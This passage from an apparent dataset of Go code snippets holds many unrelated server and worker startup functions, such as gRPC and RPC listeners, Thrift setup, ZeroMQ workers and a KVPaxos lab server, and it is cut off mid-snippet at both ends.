query.NewTaskHandler(\n\t\t\tr.config.Query,\n\t\t\tr.factory.taskServer,\n\t\t\tquery.NewIntermediateTaskProcessor(*r.node, r.config.Query.Timeout.Duration(),\n\t\t\t\tr.stateMgr, r.srv.taskManager, r.srv.transportManager),\n\t\t\tr.queryPool,\n\t\t),\n\t}\n\n\tprotoCommonV1.RegisterTaskServiceServer(r.grpcServer.GetServer(), r.rpcHandler.handler)\n\n\tgo serveGRPCFn(r.grpcServer)\n}", "func run() error {\n\tlistenOn := \"127.0.0.1:8080\"\n\tlistener, err := net.Listen(\"tcp\", listenOn)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed to listen on %s: %w\", listenOn, err)\n\t}\n\n\tserver := grpc.NewServer()\n\tuserv1.RegisterUserServiceServer(server, &userServiceServer{})\n\tlog.Println(\"Listening on\", listenOn)\n\n\tif err := server.Serve(listener); err != nil {\n\t\treturn fmt.Errorf(\"failed to serve gRPC server: %w\", err)\n\t}\n\n\treturn nil\n}", "func startServer(t testing.TB, h jsonrpc2.Handler) net.Listener {\n\tlistener, err := net.Listen(\"tcp\", bindAddr)\n\tif err != nil {\n\t\tt.Fatal(\"Listen:\", err)\n\t}\n\tgo func() {\n\t\tif err := serve(context.Background(), listener, h); err != nil && !strings.Contains(err.Error(), \"use of closed network connection\") {\n\t\t\tt.Fatal(\"jsonrpc2.Serve:\", err)\n\t\t}\n\t}()\n\treturn listener\n}", "func (t *gRPCTransport) start() {\n\t// start Communicate RPC\n\tif t.l() {\n\t\tt.logger.Info(\"starting gRPC server\")\n\t}\n\tgo func() {\n\t\terr := t.grpcServer.Serve(t.lis)\n\t\tif err != nil && t.l() {\n\t\t\tt.logger.Error(\"gRPC serve ended with error\", zap.Error(err))\n\t\t}\n\t}()\n\n\t// connect to peers' RaftProtocolServers\n\tdone := make(chan struct{})\n\tfor _, p := range t.peers {\n\t\tgo func(p *peer) {\n\t\t\tp.connectLoop()\n\t\t\tdone <- struct{}{}\n\t\t}(p)\n\t}\n\tfor range t.peers {\n\t\t<-done\n\t}\n\tfor _, p := range t.peers {\n\t\tgo p.loop()\n\t}\n\tif t.l() {\n\t\tt.logger.Info(\"connected to all peers\")\n\t}\n\n\t// start sendLoop\n\tgo t.sendLoop()\n}", "func (this *Engine) launchRpcServe() (done chan null.NullStruct) {\n\tvar (\n\t\tprotocolFactory thrift.TProtocolFactory\n\t\tserverTransport thrift.TServerTransport\n\t\ttransportFactory thrift.TTransportFactory\n\t\terr error\n\t\tserverNetwork string\n\t)\n\n\tswitch config.Engine.Rpc.Protocol {\n\tcase \"binary\":\n\t\tprotocolFactory = thrift.NewTBinaryProtocolFactoryDefault()\n\n\tcase \"json\":\n\t\tprotocolFactory = thrift.NewTJSONProtocolFactory()\n\n\tcase \"simplejson\":\n\t\tprotocolFactory = thrift.NewTSimpleJSONProtocolFactory()\n\n\tcase \"compact\":\n\t\tprotocolFactory = thrift.NewTCompactProtocolFactory()\n\n\tdefault:\n\t\tpanic(fmt.Sprintf(\"Unknown protocol: %s\", config.Engine.Rpc.Protocol))\n\t}\n\n\t// client-side Thrift protocol/transport stack must match\n\t// the server-side, otherwise you are very likely to get in trouble\n\tswitch {\n\tcase config.Engine.Rpc.Framed:\n\t\t// each payload is sent over the wire with a frame header containing its size\n\t\ttransportFactory = thrift.NewTFramedTransportFactory(transportFactory)\n\n\tdefault:\n\t\t// there is no BufferedTransport in Java: only FramedTransport\n\t\ttransportFactory = thrift.NewTBufferedTransportFactory(\n\t\t\tconfig.Engine.Rpc.BufferSize)\n\t}\n\n\tswitch {\n\tcase strings.Contains(config.Engine.Rpc.ListenAddr, \"/\"):\n\t\tserverNetwork = \"unix\"\n\t\tif config.Engine.Rpc.SessionTimeout > 0 {\n\t\t\tserverTransport, err = NewTUnixSocketTimeout(\n\t\t\t\tconfig.Engine.Rpc.ListenAddr, config.Engine.Rpc.SessionTimeout)\n\t\t} else {\n\t\t\tserverTransport, err = NewTUnixSocket(\n\t\t\t\tconfig.Engine.Rpc.ListenAddr)\n\t\t}\n\n\tdefault:\n\t\tserverNetwork = \"tcp\"\n\t\tif config.Engine.Rpc.SessionTimeout > 0 {\n\t\t\tserverTransport, err = thrift.NewTServerSocketTimeout(\n\t\t\t\tconfig.Engine.Rpc.ListenAddr, config.Engine.Rpc.SessionTimeout)\n\t\t} else {\n\t\t\tserverTransport, err = thrift.NewTServerSocket(\n\t\t\t\tconfig.Engine.Rpc.ListenAddr)\n\t\t}\n\t}\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\t// dial zk before startup servants\n\t// because proxy servant is dependent upon zk\n\tif config.Engine.EtcdSelfAddr != \"\" {\n\t\tif err := etclib.Dial(config.Engine.EtcdServers); err != nil {\n\t\t\tpanic(err)\n\t\t} else {\n\t\t\tlog.Debug(\"etcd connected: %+v\", config.Engine.EtcdServers)\n\t\t}\n\t}\n\n\t// when config loaded, create the servants\n\tthis.svt = servant.NewFunServantWrapper(config.Engine.Servants)\n\tthis.rpcProcessor = rpc.NewFunServantProcessor(this.svt)\n\tthis.svt.Start()\n\n\tthis.rpcServer = NewTFunServer(this,\n\t\tconfig.Engine.Rpc.PreforkMode,\n\t\tthis.rpcProcessor,\n\t\tserverTransport, transportFactory, protocolFactory)\n\tlog.Info(\"RPC server ready at %s:%s\", serverNetwork, config.Engine.Rpc.ListenAddr)\n\n\tthis.launchDashboard()\n\n\tdone = make(chan null.NullStruct)\n\tgo func() {\n\t\tif err = this.rpcServer.Serve(); err != nil {\n\t\t\tlog.Error(\"RPC server: %+v\", err)\n\t\t}\n\n\t\tdone <- null.Null\n\t}()\n\n\treturn done\n}", "func (twrkr *twerk) startWorker() {\n\n\tgo func() {\n\t\ttwrkr.waitOnWorld()\n\t\ttwrkr.liveWorkersNum.Incr()\n\t\tdefer func() {\n\t\t\ttwrkr.waitOnWorld()\n\t\t\ttwrkr.liveWorkersNum.Decr()\n\t\t}()\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase job, _ := <-twrkr.jobListener:\n\t\t\t\ttwrkr.waitOnWorld()\n\t\t\t\ttwrkr.currentlyWorkingNum.Incr()\n\t\t\t\treturnValues := twrkr.callable.CallFunction(job.arguments)\n\t\t\t\tif len(returnValues) > 0 {\n\t\t\t\t\tgo func() {\n\t\t\t\t\t\tjob.returnTo <- returnValues\n\t\t\t\t\t\tclose(job.returnTo)\n\t\t\t\t\t}()\n\t\t\t\t}\n\t\t\t\ttwrkr.waitOnWorld()\n\t\t\t\ttwrkr.currentlyWorkingNum.Decr()\n\t\t\tcase <-twrkr.broadcastDie:\n\t\t\t\t// somebody requested that we die\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}()\n\n}", "func (g *GRPC) Run() error {\n\tvar err error\n\tg.listener, err = net.Listen(connProtocol, fmt.Sprintf(\":%s\", g.port))\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tgo g.serve()\n\treturn nil\n}", "func (f *framework) startHTTP() {\n\tf.log.Printf(\"serving grpc on %s\\n\", f.ln.Addr())\n\terr := f.task.CreateServer().Serve(f.ln)\n\tselect {\n\tcase <-f.httpStop:\n\t\tf.log.Printf(\"grpc stops serving\")\n\tdefault:\n\t\tif err != nil {\n\t\t\tf.log.Fatalf(\"grpc.Serve returns error: %v\\n\", err)\n\t\t}\n\t}\n}", "func (w *worker) start() {\n\tgo func() {\n\t\tfor {\n\t\t\tw.workerPool <- w.JobChannel\n\n\t\t\tjob := <-w.JobChannel\n\t\t\thandler, err := w.CommandHandler.GetHandler(job)\n\t\t\tif err != nil {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tif !job.IsValid() {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tif err = handler.Handle(job); err != nil {\n\t\t\t\tglog.Error(err)\n\t\t\t}\n\t\t}\n\t}()\n}", "func init(){\n\tskeleton.RegisterChanRPC(reflect.TypeOf(&msg.Hello{}), handleHello)\n}", "func main() {\n\t\n\tlog.Println(\"start of twitter-streamer server -- twitter-streamer .....\")\n\n\tlistener, err := net.Listen(\"tcp\",\"localhost\"+port) // setup listener\n\tif err != nil {\n\t\tlog.Fatalf(\"Server, failed on listen: %v\",err)\n\t}\n\tgrpcServer := grpc.NewServer()\n\tpb.RegisterTweetServiceServer(grpcServer, new(server)) // register the service\n\n\tlog.Printf(\"server listening on port -> %s\\n\",port)\n\t\n\tif err := grpcServer.Serve(listener); err != nil { // listen serve client connections\n\t\tlog.Fatalf(\"Server, failed to server: %v\",err)\n\t}\n}", "func (r *RPCServer) Start() (err error) {\n\t// register the shared methods\n\trpc.Register(&shared.Handler{\n\t\tStore: r.store,\n\t})\n\n\tlog.Print(\"Starting RPC server on port: \", r.port)\n\tr.listener, err = net.Listen(\"tcp\", r.port)\n\tif err != nil {\n\t\treturn\n\t}\n\n\trpc.Accept(r.listener)\n\n\treturn\n}", "func setUpRPC(nodeRPC string) {\n\trpcServ := new(Service)\n\trpc.Register(rpcServ)\n\trpcAddr, err := net.ResolveTCPAddr(\"tcp\", nodeRPC)\n\tif err != nil {\n\t\tlog.Fatal(\"listen error:\", err)\n\t}\n\tl, e := net.ListenTCP(consts.TransProtocol, rpcAddr)\n\tif e != nil {\n\t\tlog.Fatal(\"listen error:\", e)\n\t}\n\tfor i := 0; i >= 0; i++ {\n\t\tconn, _ := l.AcceptTCP()\n\t\tcolorprint.Alert(\"=========================================================================================\")\n\t\tcolorprint.Debug(\"REQ \" + strconv.Itoa(i) + \": ESTABLISHING RPC REQUEST CONNECTION WITH \" + conn.LocalAddr().String())\n\t\tgo rpc.ServeConn(conn)\n\t\tcolorprint.Blue(\"REQ \" + strconv.Itoa(i) + \": Request Served\")\n\t\tcolorprint.Alert(\"=========================================================================================\")\n\t\tdefer conn.Close()\n\t}\n\tl.Close()\n\n\t// rpcServ := new(FTService)\n\t// rpc.Register(rpcServ)\n\t// rpcAddr, err := net.ResolveTCPAddr(\"tcp\", nodeRPC)\n\t// if err != nil {\n\t// \tlog.Fatal(\"listen error:\", err)\n\t// }\n\t// l, e := net.ListenTCP(consts.TransProtocol, rpcAddr)\n\t// if e != nil {\n\t// \tlog.Fatal(\"listen error:\", e)\n\t// }\n\t// for i := 0; i >= 0; i++ {\n\t// \tconn, _ := l.AcceptTCP()\n\t// \tcolorprint.Alert(\"=========================================================================================\")\n\t// \tcolorprint.Debug(\"REQ \" + strconv.Itoa(i) + \": ESTABLISHING RPC REQUEST CONNECTION WITH \" + conn.LocalAddr().String())\n\t// \trpc.ServeConn(conn)\n\t// \tcolorprint.Blue(\"REQ \" + strconv.Itoa(i) + \": Request Served\")\n\t// \tcolorprint.Alert(\"=========================================================================================\")\n\t// \t//defer conn.Close()\n\t// }\n\t// l.Close()\n\n}", "func main() {\n\trequests = make(chan *Message, 50)\n\n\t//Initialize Server\n\tnotListening := make(chan bool)\n\t//log.Printf(\"STATUS: %v INBRANCH: %v FCOUNT: %v\", ThisNode.SN, (*ThisNode.inBranch).Weight, ThisNode.findCount)\n\tgo func(nl chan bool) {\n\t\tdefer func() {\n\t\t\tnl <- true\n\t\t}()\n\t\tl, err := net.Listen(\"tcp\", PORT)\n\t\tfmt.Println(\"Listening\")\n\t\tLogger.Println(\"Listening\")\n\t\tif err != nil {\n\t\t\tLogger.Fatal(err)\n\t\t}\n\n\t\tfor {\n\t\t\tconn, err := l.Accept()\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatal(err)\n\t\t\t}\n\n\t\t\t// Handle the connection in a new goroutine.\n\t\t\tgo serveConn(conn, requests)\n\t\t}\n\t}(notListening)\n\n\t//Process incomming messages\n\tgo processMessage(requests)\n\n\tif wakeup {\n\t\ttime.Sleep(time.Second * 11)\n\t\tThisNode.Wakeup()\n\t}\n\n\t//Wait until listening routine sends signal\n\t<-notListening\n}", "func (w *Worker) Listen() (err error) {\n\tif w.WorkerID == \"\" || w.RequestID == \"\" {\n\t\treturn errors.Errorf(\"workerID and requestID required\")\n\t}\n\tstream, err := w.eventStream()\n\tif err == nil {\n\t\tif err = stream.Start(); err != nil {\n\t\t\treturn\n\t\t}\n\t\tdefer stream.Stop()\n\t\tstream.Send(&rpc.StreamingMessage{\n\t\t\tContent: &rpc.StreamingMessage_StartStream{\n\t\t\t\tStartStream: &rpc.StartStream{\n\t\t\t\t\tWorkerId: w.WorkerID,\n\t\t\t\t},\n\t\t\t},\n\t\t})\n\t\tch := w.getChannel(stream)\n\t\tmsg, ok := stream.Recv()\n\t\tfor ok {\n\t\t\tswitch msgT := msg.Content.(type) {\n\t\t\tcase *rpc.StreamingMessage_StartStream:\n\t\t\t\tch.StartStream(msg.RequestId, msgT.StartStream)\n\t\t\tcase *rpc.StreamingMessage_WorkerInitRequest:\n\t\t\t\tch.InitRequest(msg.RequestId, msgT.WorkerInitRequest)\n\t\t\tcase *rpc.StreamingMessage_WorkerHeartbeat:\n\t\t\t\tch.Heartbeat(msg.RequestId, msgT.WorkerHeartbeat)\n\t\t\tcase *rpc.StreamingMessage_WorkerTerminate:\n\t\t\t\tch.Terminate(msg.RequestId, msgT.WorkerTerminate)\n\t\t\tcase *rpc.StreamingMessage_WorkerStatusRequest:\n\t\t\t\tch.StatusRequest(msg.RequestId, msgT.WorkerStatusRequest)\n\t\t\tcase *rpc.StreamingMessage_FileChangeEventRequest:\n\t\t\t\tch.FileChangeEventRequest(msg.RequestId, msgT.FileChangeEventRequest)\n\t\t\tcase *rpc.StreamingMessage_FunctionLoadRequest:\n\t\t\t\tch.FunctionLoadRequest(msg.RequestId, msgT.FunctionLoadRequest)\n\t\t\tcase *rpc.StreamingMessage_InvocationRequest:\n\t\t\t\tch.InvocationRequest(msg.RequestId, msgT.InvocationRequest)\n\t\t\tcase *rpc.StreamingMessage_InvocationCancel:\n\t\t\t\tch.InvocationCancel(msg.RequestId, msgT.InvocationCancel)\n\t\t\tcase *rpc.StreamingMessage_FunctionEnvironmentReloadRequest:\n\t\t\t\tch.FunctionEnvironmentReloadRequest(msg.RequestId, msgT.FunctionEnvironmentReloadRequest)\n\t\t\t}\n\t\t\tmsg, ok = stream.Recv()\n\t\t}\n\t}\n\treturn\n}", "func (w *Worker) Start() {\n\tgo func() {\n\t\tfor {\n\t\t\t// Add ourselves into the worker queue.\n\t\t\tw.WorkerQueue <- w.Work\n\n\t\t\tselect {\n\t\t\tcase work := <-w.Work:\n\t\t\t\t// Receive a work request.\n\t\t\t\tvar ris Response\n\t\t\t\tris.RequestId = work.RequestId\n\t\t\t\tris.Result, ris.Correct, ris.NSV = generateTrainset(work.TsToAnalyze, w.TsData, w.Output)\n\t\t\t\twork.Response <- ris\n\t\t\tcase <-w.QuitChan:\n\t\t\t\t// We have been asked to stop.\n\t\t\t\tlog.Printf(\"worker%d stopping\\n\", w.ID)\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}()\n}", "func (gw *GrpcWrapper) Start() error {\n\tif gw.ln != nil {\n\t\treturn nil\n\t}\n\tln, err := net.Listen(\"tcp\", fmt.Sprintf(\":%d\", gw.port))\n\tif err != nil {\n\t\tgw.logger.WithFields(log.Fields{\n\t\t\t\"error\": err.Error(),\n\t\t\t\"port\": gw.port,\n\t\t}).Error(\"net.Listen() error\")\n\t\treturn err\n\t}\n\tgw.ln = ln\n\n\tgw.logger.WithFields(log.Fields{\"port\": gw.port}).Info(\"TCP net listener initialized\")\n\n\tserver := grpc.NewServer(grpc.StatsHandler(&ocgrpc.ServerHandler{}))\n\tfor _, handlerFunc := range gw.handlerFuncs {\n\t\thandlerFunc(server)\n\t}\n\tgw.server = server\n\tgw.grpcAwaiter = make(chan error)\n\n\tgo func() {\n\t\tgw.logger.Infof(\"Serving gRPC on :%d\", gw.port)\n\t\terr := gw.server.Serve(ln)\n\t\tgw.grpcAwaiter <- err\n\t\tif err != nil {\n\t\t\tgw.logger.WithFields(log.Fields{\"error\": err.Error()}).Error(\"gRPC serve() error\")\n\t\t}\n\t}()\n\n\treturn nil\n}", "func Run(ctx context.Context, port string) struct{} {\n\n\t//The server to get up\n\tli, err := net.Listen(\"tcp\", port)\n\tif err != nil {\n\t\tlog.Fatalf(\"Server stopped: %v\", err)\n\t}\n\n\t//Passing the server to grpc\n\ts := &Server{}\n\tgrpcServer := grpc.NewServer()\n\tsubscribe.RegisterSubscribeServiceServer(grpcServer, s)\n\tgrpcServer.Serve(li)\n\n\tfmt.Printf(\"Server up on port: %v\\n\", err)\n\treturn <-ctx.Done()\n}", "func (w *worker) start() {\n\tatomic.StoreInt32(&w.running, 1)\n\tw.startCh <- struct{}{}\n}", "func worker() {\n\tworker, err := zmq4.NewSocket(zmq4.DEALER)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\n\tdefer worker.Close()\n\tworker.Connect(\"inproc://backend\")\n\n\tfor {\n\t\tmsg, err := worker.RecvMessage(0)\n\t\tif err != nil {\n\t\t\tlog.Println(err)\n\t\t}\n\n\t\tid, content := pop(msg)\n\n\t\treplies := rand.Intn(5)\n\t\tfor reply := 0; reply < replies; reply++ {\n\t\t\ttime.Sleep(time.Duration(rand.Intn(1000)+1) * time.Millisecond)\n\t\t\tworker.SendMessage(id, content)\n\t\t}\n\t}\n}", "func (s *serv) Start() {\n\ts.running = true\n\n\tsem := make(chan byte)\n\n\tgo func() {\n\t\t// Start listening\n\t\ts.listen()\n\t\tsem <- 0\n\t}()\n\n\tgo func() {\n\t\tfor {\n\t\t\tp := <-s.pks\n\t\t\t// Dispatch work\n\t\t\tswitch p.(type) {\n\t\t\tcase *network.MessagePacket:\n\t\t\t\t_ = p.(*network.MessagePacket)\n\t\t\tcase *network.ConnectionPacket:\n\t\t\t\t_ = p.(*network.ConnectionPacket)\n\t\t\tdefault:\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\t}()\n\n\t<-sem\n}", "func main() {\n\tgob.Register(&net.TCPAddr{})\n\n\tknownFiles = make(map[string][]string)\n\trand.Seed(time.Now().UnixNano())\n\n\targs := os.Args[1:]\n\tserverIP := args[0]\n\tServerInterface := new(MyServer)\n\tserverRPC := rpc.NewServer()\n\tregisterServer(serverRPC, ServerInterface)\n\tl, e := net.Listen(\"tcp\", serverIP)\n\tif e != nil {\n\t\tlog.Fatal(\"server error:\", e)\n\t\treturn\n\t}\n\n\tfor {\n\t\tconn, _ := l.Accept()\n\t\tgo serverRPC.ServeConn(conn)\n\t}\n}", "func workerTask() {\n\tworker, err := zmq4.NewSocket(zmq4.REQ)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\n\tdefer worker.Close()\n\tworker.Connect(\"ipc://backend.ipc\")\n\tworker.SendMessage(WorkerReady)\n\n\tfor {\n\n\t\tmsg, err := worker.RecvMessage(0)\n\t\tif err != nil {\n\t\t\tlog.Fatalln(err)\n\t\t}\n\n\t\tmsg[len(msg)-1] = \"OK\"\n\t\tworker.SendMessage(msg)\n\t}\n\n}", "func startupServer(t *testing.T) (lightning *glightning.Lightning, requestQ, replyQ chan []byte) {\n\ttmpfile, err := ioutil.TempFile(\"\", \"rpc.socket\")\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tos.Remove(tmpfile.Name())\n\n\trequestQueue := make(chan []byte)\n\treplyQueue := make(chan []byte)\n\tok := make(chan bool)\n\n\tgo func(socket string, t *testing.T, requestQueue, replyQueue chan []byte, ok chan bool) {\n\t\tln, err := net.Listen(\"unix\", socket)\n\t\tif err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\t\tfor {\n\t\t\tok <- true\n\t\t\tinconn, err := ln.Accept()\n\t\t\tif err != nil {\n\t\t\t\tt.Fatal(err)\n\t\t\t}\n\t\t\tgo listen(inconn, requestQueue, t)\n\t\t\tgo writer(inconn, replyQueue, t)\n\t\t}\n\t}(tmpfile.Name(), t, requestQueue, replyQueue, ok)\n\n\t// block until the socket is listening\n\t<-ok\n\n\tlightning = glightning.NewLightning()\n\tlightning.StartUp(\"\", tmpfile.Name())\n\treturn lightning, requestQueue, replyQueue\n}", "func (s *Server) serve(lis net.Listener) {\n\ts.wg.Add(1)\n\tgo func() {\n\t\tlog.Infof(\"Listening on %s\", lis.Addr())\n\t\terr := s.httpServer.Serve(lis)\n\t\tlog.Tracef(\"Finished serving RPC: %v\", err)\n\t\ts.wg.Done()\n\t}()\n}", "func main() {\n\t// create a listener on TCP port 7777\n\tlis, err := net.Listen(\"tcp\", \":7777\")\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to listen: %v\", err)\n\t}\n\n\t// create a server instance\n\ts := api.Server{}\n\n\t// create the TLS creds\n\tcreds, err := credentials.NewServerTLSFromFile(\"cert/server.crt\", \"cert/server.key\")\n\tif err != nil {\n\t\tlog.Fatalf(\"could not load TLS keys: %s\", err)\n\t}\n\n\t// add credentials to the gRPC options\n\topts := []grpc.ServerOption{grpc.Creds(creds)}\n\n\t// create a gRPC server object\n\tgrpcServer := grpc.NewServer(opts...)\n\n\t// attach the Ping service to the server\n\tapi.RegisterPingServer(grpcServer, &s)\n\n\t// start the server\n\tif err := grpcServer.Serve(lis); err != nil {\n\t\tlog.Fatalf(\"failed to serve: %v\", err)\n\t}\n}", "func LaunchRpcServer() {\n\t// Setup replica server\n\taddy, err := net.ResolveTCPAddr(\"tcp\", \"0.0.0.0:\"+strconv.Itoa(config.Replication.Rpc_server_port_num))\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\t// Set listener\n\tinbound, err := net.ListenTCP(\"tcp\", addy)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\t// Launch\n\tlog.Println(\"RPC Server Listening to... http://0.0.0.0:\" + strconv.Itoa(config.Replication.Rpc_server_port_num))\n\tlistener := new(Listener)\n\trpc.Register(listener)\n\trpc.Accept(inbound)\n\n}", "func main() {\n\tlis, err := net.Listen(\"tcp\", \":9091\")\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to listen: %v\", err)\n\t}\n\n\tdao := database.CreateDAO(database.CreateConn())\n\tsvc := service.CreateService(dao)\n\n\tgrpcServer := grpc.NewServer()\n\n\t// attach the Ping service to the server\n\tpb.RegisterDBServer(grpcServer, &svc)\n\t// start the server\n\tif err := grpcServer.Serve(lis); err != nil {\n\t\tlog.Fatalf(\"failed to serve: %s\", err)\n\t}\n}", "func (m *Manager) Start(srv *server.TCP) {\n\tm.serverMutex.Lock()\n\tdefer m.serverMutex.Unlock()\n\n\tm.server = srv\n\n\tm.messageWorkerPool.Start()\n\tm.messageRequestWorkerPool.Start()\n}", "func StartServer(servers []string, me int) *KVPaxos {\n // this call is all that's needed to persuade\n // Go's RPC library to marshall/unmarshall\n // struct Op.\n gob.Register(Op{})\n\n kv := new(KVPaxos)\n kv.me = me\n\n // Your initialization code here.\n kv.data = make(map[string]string)\n kv.pendingRead = make(map[int64]*PendingRead)\n kv.applied = -1\n\n rpcs := rpc.NewServer()\n rpcs.Register(kv)\n\n kv.px = paxos.Make(servers, me, rpcs)\n\n // start worker\n kv.StartBackgroundWorker()\n\n os.Remove(servers[me])\n l, e := net.Listen(\"unix\", servers[me]);\n if e != nil {\n log.Fatal(\"listen error: \", e);\n }\n kv.l = l\n\n // please do not change any of the following code,\n // or do anything to subvert it.\n\n go func() {\n for kv.dead == false {\n conn, err := kv.l.Accept()\n if err == nil && kv.dead == false {\n if kv.unreliable && (rand.Int63() % 1000) < 100 {\n // discard the request.\n conn.Close()\n } else if kv.unreliable && (rand.Int63() % 1000) < 200 {\n // process the request but force discard of reply.\n c1 := conn.(*net.UnixConn)\n f, _ := c1.File()\n err := syscall.Shutdown(int(f.Fd()), syscall.SHUT_WR)\n if err != nil {\n fmt.Printf(\"shutdown: %v\\n\", err)\n }\n go rpcs.ServeConn(conn)\n } else {\n go rpcs.ServeConn(conn)\n }\n } else if err == nil {\n conn.Close()\n }\n if err != nil && kv.dead == false {\n fmt.Printf(\"KVPaxos(%v) accept: %v\\n\", me, err.Error())\n kv.kill()\n }\n }\n }()\n\n return kv\n}", "func (s *server) Start() {\n\t// A duplicator for notifications intended for all clients runs\n\t// in another goroutines. Any such notifications are sent to\n\t// the allClients channel and then sent to each connected client.\n\t//\n\t// Use a sync.Once to insure no extra duplicators run.\n\tgo duplicateOnce.Do(clientResponseDuplicator)\n\n\tlog.Trace(\"Starting RPC server\")\n\n\tserveMux := http.NewServeMux()\n\tconst rpcAuthTimeoutSeconds = 10\n\thttpServer := &http.Server{\n\t\tHandler: serveMux,\n\n\t\t// Timeout connections which don't complete the initial\n\t\t// handshake within the allowed timeframe.\n\t\tReadTimeout: time.Second * rpcAuthTimeoutSeconds,\n\t}\n\tserveMux.HandleFunc(\"/\", func(w http.ResponseWriter, r *http.Request) {\n\t\tif err := s.checkAuth(r); err != nil {\n\t\t\tlog.Warnf(\"Unauthorized client connection attempt\")\n\t\t\thttp.Error(w, \"401 Unauthorized.\", http.StatusUnauthorized)\n\t\t\treturn\n\t\t}\n\t\ts.ServeRPCRequest(w, r)\n\t})\n\tserveMux.HandleFunc(\"/frontend\", func(w http.ResponseWriter, r *http.Request) {\n\t\tauthenticated := false\n\t\tif err := s.checkAuth(r); err != nil {\n\t\t\t// If auth was supplied but incorrect, rather than simply being\n\t\t\t// missing, immediately terminate the connection.\n\t\t\tif err != ErrNoAuth {\n\t\t\t\tlog.Warnf(\"Disconnecting improperly authorized websocket client\")\n\t\t\t\thttp.Error(w, \"401 Unauthorized.\", http.StatusUnauthorized)\n\t\t\t\treturn\n\t\t\t}\n\t\t} else {\n\t\t\tauthenticated = true\n\t\t}\n\n\t\t// A new Server instance is created rather than just creating the\n\t\t// handler closure since the default server will disconnect the\n\t\t// client if the origin is unset.\n\t\twsServer := websocket.Server{\n\t\t\tHandler: websocket.Handler(func(ws *websocket.Conn) {\n\t\t\t\ts.WSSendRecv(ws, r.RemoteAddr, authenticated)\n\t\t\t}),\n\t\t}\n\t\twsServer.ServeHTTP(w, r)\n\t})\n\tfor _, listener := range s.listeners {\n\t\ts.wg.Add(1)\n\t\tgo func(listener net.Listener) {\n\t\t\tlog.Infof(\"RPCS: RPC server listening on %s\", listener.Addr())\n\t\t\thttpServer.Serve(listener)\n\t\t\tlog.Tracef(\"RPCS: RPC listener done for %s\", listener.Addr())\n\t\t\ts.wg.Done()\n\t\t}(listener)\n\t}\n}", "func main() {\n\n\tlis ,err := net.Listen(\"tcp\",fmt.Sprintf(\":%d\", 1368))\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tserver := grpc.NewServer()\n\trpc.RegisterUserServiceServer(server, &service.UserService{})\n\n\terr = server.Serve(lis)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n}", "func (a *agent) listen(wg *sync.WaitGroup) {\n\tLog().Debugf(\"Starting EventLoop on %d-%s\", a.ID, a.Label)\n\tfor e := range a.packetChan {\n\t\t// Receive a work request.\n\t\tmetrics.set(METRIC_CONNECTION_TRANSIT, a.conf.PipelineName, a.Label, len(a.packetChan))\n\t\tif err := a.processor.Receive(e); err != nil {\n\t\t\tLog().Errorf(\"agent %s: %s\", a.conf.Type, err.Error())\n\t\t}\n\t\tmetrics.increment(METRIC_PROC_IN, a.conf.PipelineName, a.Label)\n\t}\n\twg.Done()\n}", "func (w *worker) start() {\n\tgo func() {\n\t\tfor {\n\t\t\tw.WorkerQueue <- w.Job\n\n\t\t\tselect {\n\t\t\tcase job := <-w.Job:\n\t\t\t\tlog.Printf(\"worker %d: %s\", w.ID, job.User.Login)\n\t\t\t\tjob.User.run()\n\t\t\tcase <-done:\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}()\n}", "func (h *Hub) Serve() error {\n\th.startTime = time.Now()\n\n\tip, err := util.GetPublicIP()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tworkersPort, err := util.ParseEndpointPort(h.endpoint)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tclientPort, err := util.ParseEndpointPort(h.grpcEndpoint)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tworkersEndpt := ip.String() + \":\" + workersPort\n\tclientEndpt := ip.String() + \":\" + clientPort\n\n\tsrv, err := frd.NewServer(h.ethKey, workersEndpt, clientEndpt)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = srv.Start()\n\tif err != nil {\n\t\treturn err\n\t}\n\tsrv.Serve()\n\n\tlistener, err := net.Listen(\"tcp\", h.endpoint)\n\n\tif err != nil {\n\t\tlog.G(h.ctx).Error(\"failed to listen\", zap.String(\"address\", h.endpoint), zap.Error(err))\n\t\treturn err\n\t}\n\tlog.G(h.ctx).Info(\"listening for connections from Miners\", zap.Stringer(\"address\", listener.Addr()))\n\n\tgrpcL, err := net.Listen(\"tcp\", h.grpcEndpoint)\n\tif err != nil {\n\t\tlog.G(h.ctx).Error(\"failed to listen\",\n\t\t\tzap.String(\"address\", h.grpcEndpoint), zap.Error(err))\n\t\tlistener.Close()\n\t\treturn err\n\t}\n\tlog.G(h.ctx).Info(\"listening for gRPC API connections\", zap.Stringer(\"address\", grpcL.Addr()))\n\t// TODO: fix this possible race: Close before Serve\n\th.minerListener = listener\n\n\th.wg.Add(1)\n\tgo func() {\n\t\tdefer h.wg.Done()\n\t\th.externalGrpc.Serve(grpcL)\n\t}()\n\n\th.wg.Add(1)\n\tgo func() {\n\t\tdefer h.wg.Done()\n\t\tfor {\n\t\t\tconn, err := h.minerListener.Accept()\n\t\t\tif err != nil {\n\t\t\t\treturn\n\t\t\t}\n\t\t\tgo h.handleInterconnect(h.ctx, conn)\n\t\t}\n\t}()\n\th.wg.Wait()\n\n\treturn nil\n}", "func (s *Server) Run() <-chan error {\n\tvar chErr chan error\n\tlog.Infoln(fmt.Sprintf(\"gRPC server has started at port %d\", s.port))\n\tgo func() {\n\t\tif err := 